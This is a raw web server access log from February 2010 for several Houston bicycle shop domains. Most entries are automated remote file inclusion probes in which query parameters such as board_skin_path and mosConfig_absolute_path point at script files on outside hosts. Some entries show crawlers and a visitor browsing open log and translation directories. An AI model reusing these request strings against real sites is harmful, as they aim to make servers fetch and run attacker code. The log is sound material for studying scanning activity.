76.205.150.225 - - [09/Feb/2010:16:18:17 -0800] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB0.0; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "svbikes.com"
76.205.150.225 - - [09/Feb/2010:16:18:18 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB0.0; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "svbikes.com"
115.68.4.15 - - [09/Feb/2010:16:21:32 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
115.68.4.15 - - [09/Feb/2010:16:21:32 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
115.68.4.15 - - [09/Feb/2010:16:21:32 -0800] "GET /delete_all.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
115.68.4.15 - - [09/Feb/2010:16:21:53 -0800] "GET /delete_all.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
115.68.4.15 - - [09/Feb/2010:16:21:53 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
115.68.4.15 - - [09/Feb/2010:16:21:53 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.151.132.176 - - [09/Feb/2010:16:22:12 -0800] "GET /logs/access.log//write.php?board_skin_path=http://www.szamitogep-szolgaltatasok.hu//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.151.132.176 - - [09/Feb/2010:16:22:40 -0800] "GET /logs/access.log//write.php?board_skin_path=http://www.szamitogep-szolgaltatasok.hu//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.151.132.176 - - [09/Feb/2010:16:22:40 -0800] "GET /write.php?board_skin_path=http://www.szamitogep-szolgaltatasok.hu//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.151.132.176 - - [09/Feb/2010:16:22:40 -0800] "GET /logs//write.php?board_skin_path=http://www.szamitogep-szolgaltatasok.hu//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.151.132.176 - - [09/Feb/2010:16:23:00 -0800] "GET /logs//write.php?board_skin_path=http://www.szamitogep-szolgaltatasok.hu//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.151.132.176 - - [09/Feb/2010:16:23:00 -0800] "GET /logs/access.log//write.php?board_skin_path=http://www.szamitogep-szolgaltatasok.hu//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.151.132.176 - - [09/Feb/2010:16:23:00 -0800] "GET /write.php?board_skin_path=http://www.szamitogep-szolgaltatasok.hu//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.151.132.176 - - [09/Feb/2010:16:24:27 -0800] "GET /logs/access.log%20%20//write.php?board_skin_path=http://www.szamitogep-szolgaltatasok.hu//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.151.132.176 - - [09/Feb/2010:16:24:27 -0800] "GET /write.php?board_skin_path=http://www.szamitogep-szolgaltatasok.hu//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.151.132.176 - - [09/Feb/2010:16:24:27 -0800] "GET /logs//write.php?board_skin_path=http://www.szamitogep-szolgaltatasok.hu//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.151.132.176 - - [09/Feb/2010:16:25:17 -0800] "GET /logs/access.log%20%20//write.php?board_skin_path=http://www.szamitogep-szolgaltatasok.hu//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.151.132.176 - - [09/Feb/2010:16:25:17 -0800] "GET /write.php?board_skin_path=http://www.szamitogep-szolgaltatasok.hu//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.151.132.176 - - [09/Feb/2010:16:25:17 -0800] "GET /logs//write.php?board_skin_path=http://www.szamitogep-szolgaltatasok.hu//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.98.23.9 - - [09/Feb/2010:16:54:31 -0800] "GET /logs/access.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.98.23.9 - - [09/Feb/2010:16:54:31 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
79.98.23.9 - - [09/Feb/2010:16:54:31 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "houstonbikeshop.com"
210.217.252.8 - - [09/Feb/2010:16:54:42 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.217.252.8 - - [09/Feb/2010:16:54:42 -0800] "GET /delete_all.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.217.252.8 - - [09/Feb/2010:16:54:42 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.217.252.8 - - [09/Feb/2010:16:54:49 -0800] "GET /delete_all.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.217.252.8 - - [09/Feb/2010:16:54:49 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.217.252.8 - - [09/Feb/2010:16:54:49 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.98.23.9 - - [09/Feb/2010:17:03:23 -0800] "GET /logs/access.log/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.207.8.238 - - [09/Feb/2010:17:15:10 -0800] "GET //vwar/backup/errors.php?error=http://www.ccio2bilan.fr/media/pdf/.3/idv5.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "houstonbikeshop.com"
67.195.115.119 - - [09/Feb/2010:17:26:41 -0800] "GET /bullitinboard/viewtopic.php?p=15375 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
91.121.18.166 - - [09/Feb/2010:17:47:14 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.18.166 - - [09/Feb/2010:17:47:14 -0800] "GET /delete_all.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.18.166 - - [09/Feb/2010:17:47:14 -0800] "GET /logs//delete_all.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.18.166 - - [09/Feb/2010:17:48:21 -0800] "GET /delete_all.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.18.166 - - [09/Feb/2010:17:48:21 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.18.166 - - [09/Feb/2010:17:48:21 -0800] "GET /logs//delete_all.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.115.111 - - [09/Feb/2010:17:56:21 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
67.195.115.111 - - [09/Feb/2010:17:56:22 -0800] "GET /blog/ HTTP/1.0" 401 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
69.13.69.245 - - [09/Feb/2010:18:05:06 -0800] "GET /logs//bbs/delete.php?board_skin_path=http://ebpo.com.ua/euro2008/plugins/spamx/templates/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.13.69.245 - - [09/Feb/2010:18:05:06 -0800] "GET /bbs/delete.php?board_skin_path=http://ebpo.com.ua/euro2008/plugins/spamx/templates/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.13.69.245 - - [09/Feb/2010:18:05:06 -0800] "GET /logs/access.log//bbs/delete.php?board_skin_path=http://ebpo.com.ua/euro2008/plugins/spamx/templates/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.82.114.106 - - [09/Feb/2010:18:11:29 -0800] "GET /login.php?dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.82.114.106 - - [09/Feb/2010:18:11:29 -0800] "GET /logs/access.log%20%20//login.php?dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.82.114.106 - - [09/Feb/2010:18:11:29 -0800] "GET /logs//login.php?dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.80.108.81 - - [09/Feb/2010:18:13:53 -0800] "GET /logs/access.log/////?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2010/2/9/2755444/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.80.108.81 - - [09/Feb/2010:18:13:53 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2010/2/9/2755444/ld1.txt? HTTP/1.1" 200 2376 "-" "Mozilla/5.0" "houstonbikeshop.com"
220.80.108.81 - - [09/Feb/2010:18:13:53 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2010/2/9/2755444/ld1.txt? HTTP/1.1" 200 1766 "-" "Mozilla/5.0" "houstonbikeshop.com"
212.241.177.123 - - [09/Feb/2010:18:17:11 -0800] "GET /logs//bbs/delete.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
212.241.177.123 - - [09/Feb/2010:18:17:11 -0800] "GET /bbs/delete.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
212.241.177.123 - - [09/Feb/2010:18:17:11 -0800] "GET /logs/access.log//bbs/delete.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
212.241.177.123 - - [09/Feb/2010:18:17:17 -0800] "GET /bbs/delete.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
212.241.177.123 - - [09/Feb/2010:18:17:18 -0800] "GET /logs/access.log//bbs/delete.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
212.241.177.123 - - [09/Feb/2010:18:17:18 -0800] "GET /logs//bbs/delete.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.18.166 - - [09/Feb/2010:18:22:48 -0800] "GET /skin/zero_vote//login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.18.166 - - [09/Feb/2010:18:22:48 -0800] "GET /logs//skin/zero_vote//login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.18.166 - - [09/Feb/2010:18:22:48 -0800] "GET /logs/access.log%20%20//skin/zero_vote//login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.80.108.81 - - [09/Feb/2010:18:23:00 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2010/2/9/2755444/ld1.txt? HTTP/1.1" 200 2376 "-" "Mozilla/5.0" "houstonbikeshop.com"
220.80.108.81 - - [09/Feb/2010:18:23:00 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2010/2/9/2755444/ld1.txt? HTTP/1.1" 200 1766 "-" "Mozilla/5.0" "houstonbikeshop.com"
220.80.108.81 - - [09/Feb/2010:18:23:01 -0800] "GET /logs/access.log/////?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2010/2/9/2755444/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.18.166 - - [09/Feb/2010:18:23:25 -0800] "GET /logs/access.log%20%20//skin/zero_vote//login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:18:26:03 -0800] "GET ///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:18:26:03 -0800] "GET /logs////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:18:26:03 -0800] "GET /logs/access.log////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.18.166 - - [09/Feb/2010:18:27:53 -0800] "GET /bbs/write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.18.166 - - [09/Feb/2010:18:27:53 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.18.166 - - [09/Feb/2010:18:27:53 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
38.100.41.66 - - [09/Feb/2010:18:27:53 -0800] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:27:59 -0800] "GET /logs/ HTTP/1.1" 200 2368 "http://www.bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:28:00 -0800] "GET /translations/ HTTP/1.1" 200 3847 "http://www.bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:28:02 -0800] "GET /tmp/ HTTP/1.0" 200 643 "http://www.bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:28:06 -0800] "GET /bullitinboard/ HTTP/1.1" 200 533 "http://www.bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:28:07 -0800] "GET /blog/ HTTP/1.1" 401 - "http://www.bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:28:10 -0800] "GET /temporarypreviewfile.html HTTP/1.1" 200 1706 "http://www.bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:28:12 -0800] "GET /fit.html HTTP/1.1" 200 17443 "http://www.bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:28:13 -0800] "GET /Employeesite/ HTTP/1.1" 401 - "http://www.bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
91.121.18.166 - - [09/Feb/2010:18:28:26 -0800] "GET /bbs/write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.18.166 - - [09/Feb/2010:18:28:26 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.18.166 - - [09/Feb/2010:18:28:26 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
38.100.41.66 - - [09/Feb/2010:18:28:39 -0800] "GET /logs/access_090810.log HTTP/1.1" 200 196608 "http://www.bicyclestoreshouston.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:28:41 -0800] "GET /logs/access_090610.log HTTP/1.1" 200 393216 "http://www.bicyclestoreshouston.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:28:43 -0800] "GET /logs/access_100110.log HTTP/1.1" 200 327680 "http://www.bicyclestoreshouston.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:28:43 -0800] "GET /logs/access_090710.log HTTP/1.1" 200 131072 "http://www.bicyclestoreshouston.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:28:47 -0800] "GET /logs/access_091210.log HTTP/1.1" 200 196608 "http://www.bicyclestoreshouston.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:28:50 -0800] "GET /logs/access_090510.log HTTP/1.1" 200 786432 "http://www.bicyclestoreshouston.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:28:54 -0800] "GET /logs/access_090910.log HTTP/1.1" 200 524288 "http://www.bicyclestoreshouston.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:28:59 -0800] "GET /logs/scripts.log HTTP/1.1" 200 71786 "http://www.bicyclestoreshouston.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:28:59 -0800] "GET /logs/access.log HTTP/1.1" 200 18138 "http://www.bicyclestoreshouston.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:02 -0800] "GET /logs/access_091110.log HTTP/1.1" 200 327680 "http://www.bicyclestoreshouston.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:02 -0800] "GET /logs/access_090410.log HTTP/1.1" 200 917504 "http://www.bicyclestoreshouston.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:03 -0800] "GET /logs/access_100210.log HTTP/1.0" 200 262144 "http://www.bicyclestoreshouston.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:03 -0800] "GET /logs/access_091010.log HTTP/1.1" 200 917504 "http://www.bicyclestoreshouston.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:05 -0800] "GET /translations/Turkish.txt HTTP/1.1" 200 32818 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:06 -0800] "GET /translations/German.txt HTTP/1.1" 200 29272 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:08 -0800] "GET /translations/Spanish.txt HTTP/1.1" 200 28587 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:09 -0800] "GET /translations/French.txt HTTP/1.1" 200 39051 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:11 -0800] "GET /translations/Dutch.txt HTTP/1.1" 200 28744 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:11 -0800] "GET /translations/English-US.txt HTTP/1.1" 200 32000 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:13 -0800] "GET /translations/Finnish.txt HTTP/1.1" 200 32278 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:13 -0800] "GET /translations/Chinese-Big5.txt HTTP/1.1" 200 32265 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:16 -0800] "GET /translations/Polish.txt HTTP/1.1" 200 33091 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:18 -0800] "GET /translations/Japanese.txt HTTP/1.1" 200 32739 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:22 -0800] "GET /translations/Chinese-GB2312.txt HTTP/1.1" 200 26834 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:25 -0800] "GET /translations/Czech.txt HTTP/1.1" 200 33290 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:27 -0800] "GET /translations/Danish.txt HTTP/1.1" 200 31970 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:29 -0800] "GET /translations/Hungarian.txt HTTP/1.1" 200 32528 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:31 -0800] "GET /translations/Icelandic.txt HTTP/1.1" 200 32529 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:32 -0800] "GET /translations/Galician.txt HTTP/1.1" 200 33430 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:33 -0800] "GET /translations/Portuguese_BR.txt HTTP/1.0" 200 28418 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:36 -0800] "GET /translations/Norwegian.txt HTTP/1.1" 200 31468 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:37 -0800] "GET /translations/Welsh.txt HTTP/1.1" 200 35212 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:38 -0800] "GET /translations/Portuguese.txt HTTP/1.1" 200 33065 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:41 -0800] "GET /translations/Russian.txt HTTP/1.1" 200 33248 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
38.100.41.66 - - [09/Feb/2010:18:29:42 -0800] "GET /translations/Korean.txt HTTP/1.1" 200 32652 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
194.1.150.2 - - [09/Feb/2010:18:29:43 -0800] "GET /delete_comment.php?board_skin_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
194.1.150.2 - - [09/Feb/2010:18:29:43 -0800] "GET /logs/access.log//delete_comment.php?board_skin_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
194.1.150.2 - - [09/Feb/2010:18:29:43 -0800] "GET /logs//delete_comment.php?board_skin_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
